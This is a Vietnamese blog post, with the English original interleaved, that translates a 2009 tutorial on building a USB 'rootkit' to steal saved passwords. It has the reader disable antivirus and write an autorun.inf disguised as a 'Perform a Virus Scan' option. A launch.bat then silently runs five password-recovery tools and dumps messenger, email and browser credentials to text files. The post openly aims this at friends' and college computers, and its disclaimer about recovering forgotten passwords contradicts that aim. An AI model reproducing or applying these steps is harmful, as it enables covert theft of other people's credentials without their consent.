Thứ Bảy, 9 tháng 1, 2010

Làm thế nào để lấy được các mật khẩu bằng một USB

How to Hack passwords using a USB

14 December 2009

Theo: http://www.hungry-hackers.com/2009/12/how-to-hack-passwords-using-a-usb.html

Bài được đưa lên Internet ngày: 14/12/2009

Lời người dịch: Bạn có thể dễ dàng khôi phục lại những mật khẩu đã bị mất trong hàng loạt các ứng dụng chạy trong các hệ điều hành Windows và bản thân hệ điều hành Windows. Đôi khi công việc này là có ích. Tuy nhiên, việc này có thể được sử dụng với những mục đích xấu mà bạn cần biết để tránh khi sử dụng Windows.

Chào các bạn,

Bạn đã từng bao giờ nghĩ là một ổ USB bình thường có thể được sử dụng như một Công cụ Thâm nhập Trái phép cho việc lấy các mật khẩu chưa? Hôm nay tôi sẽ chỉ cho các bạn cách để lấy các mật khẩu bằng việc sử dụng một đầu USB.

Như các bạn đều biết, Windows lưu trữ hầu hết các mật khẩu mà chúng được sử dụng hàng ngày, bao gồm cả các mật khẩu của trình thông điệp tức thì (chat) như của MSN, Yahoo, AOL, Windows messenger, … Cùng với những thứ này, Windows cũng lưu trữ các mật khẩu các tài khoản của Outlook Express, SMTP, POP, FTP và các mật khẩu tự động hoàn tất của nhiều trình duyệt như IE và Firefox. Có nhiều công cụ để phục hồi lại những mật khẩu này từ những nơi lưu trữ chúng.

Việc sử dụng các công cụ này và một đầu USB là bạn có thể tạo cho riêng bạn một bộ công cụ để lấy các mật khẩu từ máy tính của những bạn bè/đồng nghiệp của bạn. Chúng ta cần các công cụ sau đây để tạo các bộ công cụ của chúng ta.

MessenPass: Phục hồi các mật khẩu của hầu hết các chương trình Thông điệp Tức thì (chat): MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenge được cung cấp với Netscape 7, Trillian, Miranda và GAIM.

Mail PassView: Phục hồi các mật khẩu của các chương trình thư điện tử sau đây: Outlook Express, Microsoft Outlook 2000 (chỉ các tài khoản POP3 và SMTP), Microsoft Outlook 2002/2003 (các tài khoản của POP3, IMAP, HTTP và SMTP), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView cũng có thể phục hồi các mật khẩu của các tài khoản thư điện tử dựa trên web (HotMail, Yahoo!, Gmail), nếu bạn sử dụng các chương trình liên quan tới các tài khoản này.

IE Passview: IE Passview là một tiện ích nhỏ mà nó làm lộ các mật khẩu được lưu trữ bởi trình duyệt Internet Explorer. Nó hỗ trợ cho IE 7.0 mới, cũng như các phiên bản cũ hơn của IE, từ v4.0 tới v6.0.

Hello Friends,

Have you ever thought that a Simple USB Drive can be used as a Destructive Tool for Hacking Passwords? Today I will show you how to hack Passwords using an USB Pen Drive.

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places.

Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage Passview: Phục hồi tất cả các mật khẩu được lưu trữ bên trong Protected Storage, bao gồm cả các mật khẩu tự động hoàn tất (AutoComplete) của IE, các mật khẩu của các site được bảo vệ bằng mật khẩu, MSN Explorer Passwords, và hơn thế nữa...

PasswordFox: PasswordFox là một công cụ nhỏ phục hồi mật khẩu mà nó cho phép bạn xem tên và mật khẩu của người sử dụng được lưu trữ trong trình duyệt web Mozilla Firefox. Mặc định, PasswordFox hiển thị các mật khẩu được lưu trữ trong hồ sơ hiện hành của bạn, nhưng bạn có thể dễ dàng chọn để nhìn các mật khẩu của bất kỳ hồ sơ của Firefox nào. Đối với với đầu vào của mật khẩu, những thông tin sau đây được hiển thị: Record Index, Web Site, User Name, Password, User Name Field, Password Field, và the Signons filename.

Đây là thủ tục từng bước một để tạo ra bộ công cụ lấy mật khẩu.

Lưu ý: Bạn phải tạm thời vô hiệu hóa chức năng chống virus (Anti-Virus) trước khi tiến hành các bước này.

1. Tải về tất cả 5 công cụ, tải chúng ra và sao chép chỉ các tệp thực thi (các tệp .exe) vào trong ổ USB. Nghĩa là sao chép các tệp - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe vào ổ USB.

2. Tạo một tệp mới trong Notepad và gõ vào các dòng sau đây vào trong đó:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Lưu tệp Notepad này với tên tệp là autorun.inf

Bây giờ hãy sao chép tệp autorun.inf vào ổ USB.

3. Tạo một tệp khác trong Notepad rồi gõ vào các dòng sau đây:

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

Lưu tệp trong Notepad bằng cái tên launch.bat

Sao chép tệp launch.bat này cũng vào ổ USB.

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedure to create the password hacking toolkit.

NOTE: You must temporarily disable your Anti-Virus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad as autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad as launch.bat

Copy the launch.bat file also to your USB drive.

Bây giờ bộ công cụ của bạn đã sẵn sàng và bạn sẵn sàng để lấy các mật khẩu. Bạn có thể sử dụng ổ USB này trên máy tính cá nhân PC của bạn của bạn hoặc máy tính của đồng nghiệp của bạn. Chỉ tuân theo các bước sau:

1. Đưa ổ USB vào và cửa sổ tự động chạy autorun sẽ bật ra pop-up. (Điều này là vì chúng ta đã tạo ra một ổ tự động chạy).

2. Trong cửa sổ pop-up, hãy chọn lựa chọn đầu tiên (Perform a Virus Scan) - Thực hiện việc quét virus.

3. Bây giờ tất cả các công cụ lấy mật khẩu sẽ âm thầm chạy ở phần nền (Quá trình này mất vài giây). Các mật khẩu sẽ được lưu trữ trong tệp .TXT.

4. Hãy loại bỏ ổ USB và bạn sẽ thấy các mật khẩu được lưu trữ trong các tệp .TXT.

Việc lấy này làm việc được trên các máy tính Windows 2000, XP và Vista.

Từ chối trách nhiệm: Tôi không có trách nhiệm về bất kỳ dạng thiệt hại nào được gây ra bằng việc sử dụng các thông tin ở trên. Chỉ dẫn ở trên chỉ là để khôi phục lại các mật khẩu đã bị mất.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista.

Disclaimer: I am not responsible for any kind of Damage caused by using the above information. The above Tutorial is only for recovering forgotten passwords.

Dịch tài liệu: Lê Trung Nghĩa

letrungnghia.foss@gmail.com

Người đăng: vào lúc
Nhãn: ,

2 nhận xét:

  1. Nặc danhlúc 07:46 2 tháng 8, 2010

    Chỉ với 2 file autorun.inf và file .bat kia mà làm cho USB thành autorun được sao? nằm mơ à.

    Trả lờiXóa

Lưu ý: Chỉ thành viên của blog này mới được đăng nhận xét.

Đăng ký: Đăng Nhận xét (Atom)